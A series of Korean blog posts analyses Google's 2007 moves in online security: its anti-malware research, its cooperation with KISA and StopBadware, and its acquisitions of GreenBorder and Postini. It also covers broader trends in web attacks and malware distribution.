Active , Passive , Response process를 통한 전방위적인 대응체제 수립이 가능할 것으로 보이고 각각의 영향력이 다름으로 인해 효과는 제한적이나 향후 1~2년 이내에 Frame화 되어 정착될 가능성이 높습니다.

 

Active method (Green border technology)의 활용은 제한적이 될 가능성이 높고 위에 언급 하였듯이 Toolbar 혹은 별도의 Plugin 형식으로 전파가 되고 사용자의 선택에 따라 활용하는 용도로 이용될 가능성 있습니다.  단점으로는 언급 하였듯이 전체적인 보안기술의 적용이 어렵습니다. 특히 국내의 경우에는 많은 사이트들에 장애를 일으키거나 정상적인 접근이 어려워 지는 경우가 발생될 것으로 예상됩니다. 사용자의 설정 요구가 매우 많아져서 오히려 사용자를 떨어지게 할 수도 있을 것 같네요.

 

구글은 사용자의 요구와 Security의 강화라는 측면에서 Web 상에서 노출되는 많은 위험들을 앞으로 적극적으로 강조할 것으로 보입니다. 분명한 사실이지만 비지니스적으로는 강조해야만 불편함에 대한 사용자의 요구를 일소 할 수 있는 명분이 생기는 것이겠죠.  

Passive Response에 해당하는 이슈들은 앞으로 많은 영향을 미칠 것으로 보이며 특히 AV벤더와의 협력관계 확대를 통한 Response 영역의 확장은 노하우가 쌓일 수록 강한 힘을 발휘 할 것 같습니다.

 

글을 쓰는 목적은 변화하는 흐름을 분석하고 이해해서 향후 방향 설정에 도움이 되었으면 하는 마음에 분석한 것이며 그 과정에서 최근 구글의 행동이 주목할 만 하여 케이스 스터디 차원일 뿐입니다.

 

감사합니다.

 

* 심각하게 고민한 내용이 아니고 그 동안 나온 기사를 바탕으로 생각나는 대로 나열한 부분입니다. 내용 중에 이해가 어려운 부분도 있을 수 있습니다. 이 부분은 설명하는 사람의 무지를 탓하시면 될 것 같습니다. 또한 내용 중에 정확하지 않은 내용도 있을 수 있습니다.  신문기사만 보고 판단한 것이라 다른 내용들이 있을 수 있습니다. 개인적으로 보는 관점이라고 봐주시면 감사하겠습니다.  재주가 없어서 그런지 이해한 내용을 전달 하는 것도 부족한 부분이 많습니다.

 

- 사족 나갑니다.

왜 국내 IT Service 기업들은 변화를 리딩 하지 못할까요?  IT Service에서 안주와 자리 지키기는 죽음에 이르는 길입니다. 죽음의 길에 조금 더 빨리 가도록 하는 것이 학벌과 지연과 인맥에 의한 것이겠죠. 특히 Global Service기업이라면 학벌, 지연, 인맥에 의존 하는 순간 초고속 급행열차로 죽음의 길에 가는 것과 다름 없습니다. 남의 떡이 커 보인다고 키워야 될 자기 것들을 팽개치고 이러다 보면 순식간에 무너지겠죠. 전문직무분야인 보안 분야에서도 그러한데 다른 분야는 오죽하겠습니까? ^^; 위험을 인지 하지도 못한다면 더 심각한 상황이라 할 수 있습니다. 매 순간이 위기인데 말입니다. 백척간두 진일보라는 말은 개인에게만 해당되는 말은 아닙니다. 지금 이 순간의 모든 IT서비스기업들에 해당이 되는 의미입니다. 당장 1년 뒤를 보장할 그 어떠한 것도 없습니다. 세계와의 경쟁에는 학벌과 인맥, 지연이 통하지 않습니다. 그리고 지금의 서비스는 이미 세계와 경쟁 중입니다. 4천만의 시장으로 먹고 살 수 있다고 생각하는 고만고만한 기업이라면 이름 없이 사라짐을 당연하게 알아야 될 것입니다. 아쉽게도 문제는 그런 기업들이 너무 많다는 것이 문제일 뿐입니다. 아쉽지만 여기까지 인 것 같습니다.


 
Posted by 바다란
 

 

바다란 입니다.

 

현재의 인터넷 환경을 주도하고 있는 화두업체인 구글에 있어서 Online security는 어떤 의미인지 이 시점에서 짚어 보는 것이 필요하다고 생각 됩니다.

전체적인 맥락에서 한번 짚어볼 부분은 반드시 있을 것 같아서 이전 Thread에서 약속한 것과 같이 3가지 Article로 정리를 하도록 하겠습니다.

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google online security strategy

3. online security의 방향과 미래

 

오늘은 2번 항목을 정리해 보도록 하겠습니다. 지난 issue 부분에서 논의된 내용을 체계적으로 구성을 하여 향후 방향에 대한 예측 부분으로 정리를 하겠습니다. 3번 항목은 미정입니다.

 

Google Online security 전략은 사실 오래 되지 않은 부분입니다. 그 동안은 자사의 서비스 시스템에 대한 안정화와 Process 강화와 관련된 부분이 가장 컸을 것으로 예상 하고 있습니다. 실상 여타 포털과 비교해서 Contents 제휴 종류와 범위로 따지면 비교도 되지 않는 (?) 구글입니다. 검색 전문업체로 시작하였기에 일면 국내에서 통용되는 포털이라는 개념과는 조금 다른 관점에 있습니다.  내부에서 개발된 Application에 대한 검증도 실시간으로 세계적인 이슈가 통용 되고 있는 보안 부분에 대해 받는 위험도와 압력은 IT 서비스 업체 모두가 해당이 됩니다.  IT 서비스업체나 Google이나 모든 웹서비스 업체는 보안에 대해 실시간으로 동일한 위험과 동일한 압력을 받고 있다고 할 수 있습니다.

 

왜 이런 위험요소들이 도출이 되고 행동들이 있는지는 전체적인 Attack trend를 살펴야만 가능합니다. 현재의 Trend는 다음과 같이 단편화 시킬 수 있습니다.

 

 

 

2005년부터 나타나기 시작한 Application에 대한 공격은 Web의 일반화와 궤를 같이 하고 있습니다. Web service의 활성화와 일반화에 따라 개발되는 모든 Application들이 Web을 통한 연결을 기본으로 하고 있습니다. 일반 C/S 환경에서 활성화 되는 Application의 수는 대폭 줄어들고 있다고 볼 수 있습니다. 아마도 일부 특수한 환경에서 사용되는 Application을 제외하고는 web 연결이 필수적인 Application이 대부분으로 예상이 됩니다. 

Web Application의 출현과 더불어 공격이 출현하게 되고 이전의 운영체제의 취약성을 노리는 직접 공격에서 운영체제 위에 설치 되고 운영이 되는 Web application에 대한 직접 공격이 증가하게 됩니다. 또한 이런 Application에 대한 공격은 자동화된 경향을 나타내며 발전하고 있습니다.

 

특정 서비스에만 특화된 Application attack의 출현도 일반적인 현상이라 할 수 있습니다.  (관련 내용은 올해 들어 여러 곳에 발표를 한 Web 2.0 관련 위험요소라는 PPT를 적당한 시점에 공개토록 하겠습니다. )

 

Web application에 대한 공격이 증가 한다고 하였습니다. 그럼 이런 공격 유형과 기업들의 변화된 움직임은 왜 일까요?. 그 변화에 대한 답은 제가 생각하기에는 다음과 같은 환경의 변화로 인해 기인 합니다.

 

위의 항목에서 보시면 각각의 서비스 기업들의 변화와 보안상의 위험요소와의 연관 관계를 추산할 수 있습니다. 제가 나누는 관점에서는 Worm의 출현에 따라 기업들의 대응과 보호 방안들이 달라지고 있다고 판단 하고 있습니다.

최초에는 Worm의 출현 -> Worm의 일반화 -> Web attack의 출현 -> Web을 통한 무차별적인 악성코드의 유포와 개인정보 도용 이런 유형으로 나눌 수 있으며 그에 따른 기업들의 대책들이 달라지고 있다고 볼 수 있습니다.

 

물론 공격유형이 변화는 사회적인 변화와도 궤를 같이 하고 있으며 세계에서 가장 빨리 위협을 경험한 곳이 대한민국이지만 향후에는 좀 더 다른 양상을 보일 수 있습니다. 개인정보를 유출 하기 위한 악성코드의 출현과 무방비로 노출된 사용자의 PC에 대한 문제는 이제는 IT 서비스를 진행하는 업체 모두에게 위험요소가 되고 있습니다.

직접적인 서비스 공격에 대한 대비도 하여야 하며 또한 서비스를 이용하는 사용자들에 대한 보호 대책도 강구 하여야 합니다. 해외는 이제 사용자들에 대한 보호 대책들이 출현하고 있는 시점이라 할 수 있습니다.

 

이른바 주가는 경기에 선행 한다고 합니다. 경기의 활성화를 미리 가늠 할 수 있는 요소가 주가 지수라는 의미인데 다른 비유를 하자면 Internet Industry의 위험요소를 가장 먼저 경험한 곳이 대한민국이고 그 위험요소가 이제 전체로 전이가 되고 있는 것으로 볼 수 있습니다. 해외 유수 IT 서비스 기업들의 움직임이 그러합니다. 적당한 비유가 생각 나지 않아 가져다 붙였습니다. ,

그 위험요소는 Web에 대한 공격이고 이런 공격들은 2005년부터 국내에 본격화 되었으며 악성코드에 대한 피해도 본격화 되었다고 볼 수 있는데 이런 위험에 대한 인식은 해외 업체들의 경우 인식에 대한 시기 자체가 조금 늦게 시작 되었습니다만 보다 더 꾸준하고 큰 영향력을 미치는 방향으로 이루어 진다는 점에 대해 주목하여야 합니다.

 

소통의 도구로 일반화 되고 향후에도 1분 이내에 전 세계와 소통 할 수 있는 Web의 발달은 더욱 가속화 될 것이고 생활과 더 밀접하게 연관이 있게 될 것입니다. 전 세계 어디에서나 글을 올리고 1분 이내에 접근 할 수 있다면 Web을 통한 모든 위험요소들의 전파도 1분 이내에 전 세계에 영향을 미칠 수 있다는 것과 동일합니다.

 

그만큼 Trustworthy web의 구현은 필수적인 요소가 될 것 입니다.

이런 요소의 중요성에 대해 인식하지 못하는 많은 서비스 업체들은 시행 착오 및  곤란을 다수 겪게 될 것이고 도중에 무너지는 경우도 종종 발생하게 될 것입니다.

지금 까지는 아니지만 앞으로 더 심각해 질 것이라는 것입니다.

 

신뢰할 만한 웹을 만들어야 된다는 것은 이제 서비스 업체들의 지상목표가 될 것이고 많은 노력이 필요하게 될 것입니다. 여기 전 세계 유명 기업들의 신뢰할 만한 웹을 위한 노력을 조금 살펴 볼 수 있는 요소가 있습니다.

 

아래의 Article Cnet.com에서 "웹보안의 미래"라는 제목으로 주요 기업을 인터뷰한 기사입니다. 참고 삼아.. – 본 인터뷰 기사를 통해서도 내부 프로세스의 흐름을 일부 예측 하는 것은 가능합니다. 이 내용은 조만간  (언제나 그랬듯이 쓰고자 하는 의지가 생기면 바로 씁니다.)

 

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158840,00.htm  구글의 치열하고 즐거운 보안 노력

http://www.zdnet.co.kr/news/internet/search/0,39031339,39158918,00.htm   야후 보안, '편집증 환자들'

http://www.zdnet.co.kr/news/internet/etc/0,39031281,39159098,00.htm  MS 데스크톱의 경험을 살리다.

 

* 위의 인터뷰를 보시면 아시겠지만 기술적인 보안이 온라인 서비스 기업에 대해 중요한 영향을 미치고 있음을 알 수 있습니다.  MS는 그 관점에서 보면 아직 갈 길이 많이 남았다고 할 수 있습니다.

 

위에 언급된 인터뷰 기사 각각에서 보듯이 웹이라는 흐름은 이제 대세가 되었으며 이러한 대세의 바탕 위에서 근본적으로 불완전한 웹이라는 메소드에 대한 보안성을 강화하고 신뢰 할 수 있는 웹으로의 전환을 위해 각각의 IT 서비스 기업들이 노력을 하고 있습니다. 그 근간에는 Process + 병적이랄 수 있는 기술적 전문인력 + 원활한 대외 협조 ( 공격자 들 및 제보자들 ) 세 가지 주요 요인으로 정리가 됩니다. 신뢰할 수 있는 웹은 보안적 이슈에 대해 신속한 대응, 문제점 보완을 할 수 있는 기술적 인력들에 의해 가능해 집니다. 인터넷은 통제가 가능한 메소드가 아니기에 더더욱 기술적인 부분이 중요해 집니다.

 

 

Trustworthy Web

 ( Web이라는 매개체가 이제는 소통의 도구에서 생활의 도구로 격상이 된 지금에 이르러서는 불완전한 Web을 신뢰하고 믿을 만한 도구로 격상을 시키는 것이 절대 화두가 될 것입니다.)

보안 부분이 중점을 기울였던 부분을 종합해 보면 자사의 서비스 ( 대부분 Web ) 보안 부분에 많은 역할을 부여하고 있습니다. 특히 IT 관련된 서비스를 직접 운영하는 곳에는 더 많은 필요성이 있을 것으로 보입니다.

 

Cnet의 인터뷰 기사에서 언급된 IT 서비스 기업들의 주된 특징으로는 자사의 서비스 부분에만 많은 신경을 썼지 사용자를 대상으로 한 보안 서비스 부분에는 상당 기간 무관심 하였던 것이 사실 입니다. 지난 해부터는 해외의 포털 및 서비스 업체들도 백신 배포 등과 같은 Action을 취하고 있지만 악성코드의 발전과 진화 속도를 따라잡지 못하고 있는 실정입니다.  다각적인 방안 모색이 필요한 시점이고 현 시점에서 확인 할 수 있는 부분은 Google의 변화 과정이 흥미로운 이슈를 제공 하고 있어서 어떤 방향으로 변화 되는지 살펴 보도록 하겠습니다. 변화를 할 수 밖에 없는 근본적인 흐름을 적어야만 왜 그렇게 하는지에 대한 이해가 가능해 진다는 판단하에 잠시 변화의 근본 원인을 짚어 봅니다.

 개요글 (http://blog.naver.com/p4ssion/50019586109 )에 몇 개의 구글의 변화 요소들을 적었습니다. 변화요소에 기반하여 다음글 한편에 지향하고자 하는 바를 짧게 정리하겠습니다.

 

* Google의 변화된 움직임을 설명하기 위해 전체의 Trend 변화와 우리가 인지 해야만 될 변화 요소에 대해 사전 설명이 필요했습니다. 그렇지 않고서는 모든 행동들의 의미와 가치를 이해 할 수 없기에 적을 수 밖에 없었습니다.

 

 -- to be continue ( 이미 완성은 되었으나 마음에 따라 올리겠습니다. 참 제멋대로죠 쩝 )

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

오랜만에 뵙습니다예고를 했었지만 쓰고 싶은 의지가 들지 않아서 오랫동안 포스트를 게재하지 않았습니다. 앞으로도 종종 마음 내키는 대로 게재 하도록 하겠습니다. 누구나 할 수 있는 말이나 분석 보다는 독자적인 시각으로 흐름과 동향을 보도록 하겠다는 마음이니 만큼 불규칙적인 게재에 대해 많은 이해를 구합니다.

  

오늘은 구글의 검색 보안과 관련된 흐름에 대한 내용을 간단하게 살펴 보겠습니다. 올해 들어 매우 빠른 행보를 보이고 있어서 한번쯤 분석을 해볼 필요성이 있을 것 같아서 해봅니다.

 

사실 구글 이라는 검색업체에서도 보안적인 이슈에 대해서는 자사의 서비스 부분의 보안적인 요소에 지금까지 신경을 써왔습니다. 그러나 현재의 흐름은 자신의 서비스뿐 아니라 불특정 다수를 겨냥한 공격이 일반화되고 있어서 자신의 서비스에만 문제가 없다고 하더라도 다른 부분에까지 영향을 받을 수 밖에 없는 구조입니다. 또한 불특정 다수에게 설치된 악성코드를 통해 직접적인 서비스에 영향을 받는 구조로 되어 있어서 높은 신경을 쓸 수 밖에 없습니다. 그러다 보니 의사결정도 아주 신속하게 나오고 있는 상태입니다.

 

검색 보안이라는 용어 자체가 조금 애매모호하지만 단순하게는 Client 보안이라고 할 수 있습니다. 간단하게 말씀 드리면 Google의 검색 결과로 추출된 결과물에 대해서 사용자가 사이트 링크에 클릭을 하였을 때 악성코드 감염되는 유형을 차단하기 위함이라 할 수 있습니다.

 

국내의 경우에는 2005년 하반기부터 유명사이트를 해킹한 이후 악성코드를 유포하는 것이 매우 활성화 되었고 현재는 조금 잠잠해 진 것으로 보이는 유형입니다만 해외에는 지난해 말부터 대응 측면에서 본격적으로 시작이 되는 것 같습니다.  흐름상으로 보면 온라인 게임에 대한 공격이 전세계적으로 최초 시도가 되었고 이후 범위를 확장하여 검색 및 IT 서비스 분야의 어뷰징 유형으로 확산 발전 되는 형태로 볼 수 있습니다.

 

IT service 업체에서 가장 중요한 부분은 Service에 대한 신뢰도입니다. 그 신뢰도의 가장 중요한 부분에 Online security가 포함이 되고 향후 중요한 포석으로 활용이 될 것임을 알 수 있습니다.  

사업의 확장은 M&A를 통해 규모를 확장 하고 영역을 확장합니다. 그러나 가장 중요한 신뢰도의 확보는 정확한 검색 알고리즘과 로직을 통해 나타내는 결과 이외에도 Security라는 측면이 중요한 요소가 있음을 이제 구글도 알아가나 봅니다. ( 한편으로는 내부적으로 얼마나 많은 문제들을 겪었을까 하는 생각도 듭니다. 위험에 대한 인지 계기가 없으면 보안이라는 부분은 항상 중요도가 낮은 부분이 됩니다.)

 

주제는 딱 한 줄로 요약 됩니다. 최소한 구글을 통한 악성코드 전파는 차단 하겠다. 나아가서는 악성코드에 대한 문제는 최소한 구글을 통해서는 일어나지 않도록 하겠다는 의지의 피력 정도 되겠습니다.

목적으로는 검색결과에 대한 신뢰도 향상 , 급증하는 보안 위험요소에 대한 대응 정도 될 것 같습니다.

회사 규모에 비해서 스케일이 작아서 좀 실망스럽긴 합니다만..~~

 

그럼 올해  본격적으로 모습을 드러낸 구글의 Online security에 대한 행보를 퍼즐 맞추기 해보도록 하겠습니다. 공식적으로 발표된 이슈만을 가지고 조합을 함으로 무리수가 따를 수 있으나 개인의 예상이라는 측면에서 봐주시면 될 것 같습니다.

 

 

구글의 2007 Security action

 

4 ( Hotbots 2007 ) 악성코드 위험 사이트 발표 ->

4월 말 KISA - Google과 악성코드 탐지 협력 -> 

5 . Greenborder의 인수 ->?

7  postini 이메일 보안업체 인수 -> 이 이슈는  online security와는 아주 조금 관련 될 것으로 예상됩니다.

 

올해들어 처음으로 구글 내부에는 Anti malware라는 조직이 신설된 것으로 알고 있습니다. ( 발표자료 보고 알았습니다.) 해당 조직의 조사에 의해 올해 4월에 있었던 Hotbots 2007 행사에서 450만개의 웹서비스를 대상으로한 악성코드 설치 위험을 지닌 통계를 발표 하였습니다.  

그 결과로 대상인 450만개에서 10% 45만개 가량의 웹서비스에서 사용자에게 영향을 줄 수 있는 악성코드의 위험성이 있다고 발표 되었는데 여기에서 중요한 것은 왜 그 조사를 진행 했으며 무엇을 하기 위해 그 업무를 했느냐가 분석이 되어야 합니다.

 

간략한 참고는 기사화된 내용이 존재 합니다.

http://www.etnews.co.kr/news/detail.html?id=200705140149

 

전문적으로 참고 하실 분은 Hotbots 2007의 컨퍼런스 발표 원문을 보시면 됩니다.

http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf

 

Hotbots2007 conference에서 다양한 주제들이 발표 되었으니 관심 있는 분들 참고 하시면 될 것 같습니다.

 

4월 말 경에는 KISA (한국정보보호진흥원) Google의 악성코드 탐지 사이트에 대한 대응 협력도 체결을 한 상황입니다.

http://www.dt.co.kr/contents.html?article_no=2007042502011060713008

 

악성코드 탐지와 관련된 또다른 움직임은  http://stopbadware.org 와도 밀접한 연관이 있습니다.  

 

 

2006년 하반기부터 운영된 사이트로서 구글 검색에서 나온 검색 결과에 대해 링크 클릭시에 악성코드를 유포한다고 보고가 된 사이트에 대한 접근은 stopbadware.org 사이트로 리디렉션 시킵니다. 검색 결과는 보여주되 악성코드를 유포하는 사이트로의 접근은 제한을 거는 것이죠. 여기서 또 트릭이 하나 있는데 검색결과에 대한 링크 허용 요청은 stopbadware.org로 직접 하게 합니다. 이 사이트의 운영은 묘하게도 하버드 법대에서 운영을 하는 것으로 나와 있죠.  항의는 하버드법대에다 진행하고 문제가 해결이 되었다면 stopbadware.org 에서 지워지면 구글도 링크를 허용하겠다 이런 정책으로 보입니다. 좋은 잔머리라고 볼 수 있을 것 같습니다. ^^; 더불어 KISA와의 협력을 통해 보다 더 한국에 특화된 악성코드 대응이 가능해 질 것으로 예상 됩니다.

 

 

Anti malware라는 팀에서의 악성코드 위험성 조사와 더불어 진행된 내용으로는 Greenborder의 인수를 병행하여 추진한 것으로 보이며 5월 말 경에 공식적으로 발표를 합니다. 내부적인 합의는 5월 중순에 완료 되었다고 합니다.

http://www.zdnet.co.kr/news/internet/hack/0,39031287,39157927,00.htm

 

Greenborder의 인수는 왜 이루어 졌을까 하는 의문 당연히 제기 되어야 합니다. 그린보더의 기술은 Firefox IE Browser 내에 가상의 Sandbox 모델을 구축하여 보안을 구현 한다고 되어 있습니다. 정말 어렵게 설명 하죠? 좀 쉽게 설명 하면 다음과 같습니다.

 

모든 웹사이트에 방문을 할 경우에 해당 웹 사이트의 데이터는 개인 PC Temporary 폴더에 저장이 됩니다. Firefox IE든 마찬가지 입니다.  악성코드의 전파는 우선 사이트에 방문 이후 모든 파일이 내려진 이후에 자동 실행등을 통해서 이루어 집니다. 그린보더는 여기에 착안을 하여 비지니스를 진행 합니다.

 

                     <cnet.com greenborder pro2 에 대한 소개 이미지>

 

자세히 들여다 보시면 Browser 테두리를 Green color로 둘러 싸고 있는 것을 볼 수 있습니다. 일단 보호가 되고 있다는 의미를 나타냅니다. 사업의 방향은 간단합니다.  Temporary 폴더로 다운로드 되는 모든 파일에 대해 실행제한을 하게 하고 설치가 되지 않도록 하기 위해  가상화된 공간을 만들고 해당 공간은 시스템에 영향이 없도록 만들어 둡니다. 그 이후 사이트를 떠나거나 브라우저 창을 종료 할 경우 파일의 삭제 혹은 가상화된 공간을 없애는 것이죠.

 

즉 모든 악성코드들의 출발점인 다운로드 이후 실행 경로와의 차단을 목적으로 진행을 합니다만 기본 경로에 대한 차단을 시행하는 역할 을 합니다. 개념상으로는 좋은 아이디어 입니다. 한번 사용을 해봤으면 정확하게 알 수 있는데 구글의 인수 이후 해당 업체를 알게 되었고 다운로드 경로가 모두 삭제되어 사용이 불가하여 웹상에서 드러난 공개자료를 통한 분석 외에는 해볼 수 없었음을 알려 드립니다.

 

이 그린보더의 문제점은 시스템에 대한 보안 적용이 필요한 모든 부분에서 문제를 일으킬 수 있다는 점입니다. 즉 구글을 제외한 모든 사이트들에서 추가적인 도구들을 사용 할 수 없는 문제들이 발생 할 수 있습니다. 이런 문제를 해결 하기 위해서는 앞으로 많은 시간이 필요할 것으로 보이나 해당 업체의 기술을 이용한 검색 결과의 안정성 보장은 빠른 시일 내에 모습을 드러낼 것으로 보입니다.

 

드러난 Google의 행보는 여기까지입니다. 단순하게 세 가지 사실을 가지고 유추해본 바로는 향후 검색 결과에 대한 사용자 신뢰도 확보에 대한 Google의 의지를 볼 수 있고 또한 동양과 서양간의 사회적 인식에 따른 보안 개념의 차이를 볼 수 있습니다.

 

올해부터 보안컨퍼런스에 전면적으로 모습을 드러낸 구글의 모습은 그 필요성에 따라 매우 빠른 움직임을 보이고 있습니다. 그만큼의 위험상황이라고 인식을 하는 것을 볼 수 있습니다. 자사의 검색결과에서 악성코드가 유포되는 유형을 공개적으로 발표를 하는 의도도 그만큼의 위험상황임을 내부에서만 알고 있기에는 위험하다고 판단 했기에 그랬을 것으로 보입니다.

  

* Article이 좀 분량이 있습니다. 계속 올리도록 하겠으며 다음에는 좀더 체계화 되고 전략적인 방향 부분을 짚어 보도록 하겠습니다 2편 정도 더 나올 것 같습니다.

 

감사합니다.

 

 

참고: 동양과 서양간의 사회적 인식에 따른 보안개념의 차이에 대한 사견

 

 - 일반적인 내용은 아닙니다만 사회적 인식에 따라 책임 소재가 국내의 경우 서비스 업체에 집중이 되는 경우가 많습니다. 금융사고의 경우에도 개인 사용자에게 설치된 악성코드로 인해 발생된 사고의 경우에도 금융권에서 배상을 해야 하는 내용등이 있어서 문제 발생 이전에 사전 대응을 주로 하도록 합니다. 수많은 ActiveX가 설치되는 이유 이기도 합니다.

 

서구권의 경우 사고 이후의 분석에 많은 강점을 보이고 있습니다. 즉 사용자에 대한 모든 행위 분석 ( CRM의 일종 )에 따라 비정상적인 행위 패턴을 보일 경우 Alert이 되도록 합니다. 즉 한번도 간적이 없는 곳 또는 사용 기록이 거의 없는 시간대에 거액의 비용을 사용하게 된다면 Abusing이라고 판단하죠. 이걸 Fraud 라고도 합니다. 이런 유형의 검출에 대해 특화된 노력들이 많이 있어 왔습니다.

 

금융권의 예를 들었읍니다만 서비스의 경우에도 개인 사용자야 어찌되든 자신의 서비스로 인해 나타나는 결과의 안정성에만 신경을 쓰는 것을 볼 수 있습니다. Google이 그 케이스를 보여 준다고 생각 됩니다.

 

 

 


 

 
Posted by 바다란